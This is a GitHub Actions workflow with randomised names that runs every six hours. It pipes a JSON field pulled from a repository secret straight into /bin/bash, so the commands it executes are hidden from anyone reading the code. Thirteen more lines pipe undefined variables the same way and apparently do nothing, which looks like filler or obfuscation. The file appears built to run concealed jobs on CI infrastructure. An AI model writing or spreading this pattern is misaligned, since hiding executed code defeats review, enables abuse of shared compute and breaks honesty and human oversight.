name: luorenzong1098
on:
  workflow_dispatch:
  schedule:
    - cron: '40 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luorenzong1098
        env:
          tzizk19711: ${{ secrets.tzizk19711 }}
        run: |
          echo $tzizk19711 | jq -r .gzib99 | /bin/bash
          echo $rrt87502 | jq -r .kwvi123 | /bin/bash
          echo $dck46802 | jq -r .u72566 | /bin/bash
          echo $aobes437 | jq -r .apo4509 | /bin/bash
          echo $tit5 | jq -r .qmgf9 | /bin/bash
          echo $cm64 | jq -r .efyfa24291 | /bin/bash
          echo $q67 | jq -r .zisn85566 | /bin/bash
          echo $erco45 | jq -r .c0644 | /bin/bash
          echo $umjb6 | jq -r .btoi787 | /bin/bash
          echo $mc14960 | jq -r .dqckb0028 | /bin/bash
          echo $pa800 | jq -r .ef82 | /bin/bash
          echo $ipoo0026 | jq -r .tchxl57 | /bin/bash
          echo $h831 | jq -r .ciby37 | /bin/bash
          echo $hhph61028 | jq -r .i18 | /bin/bash

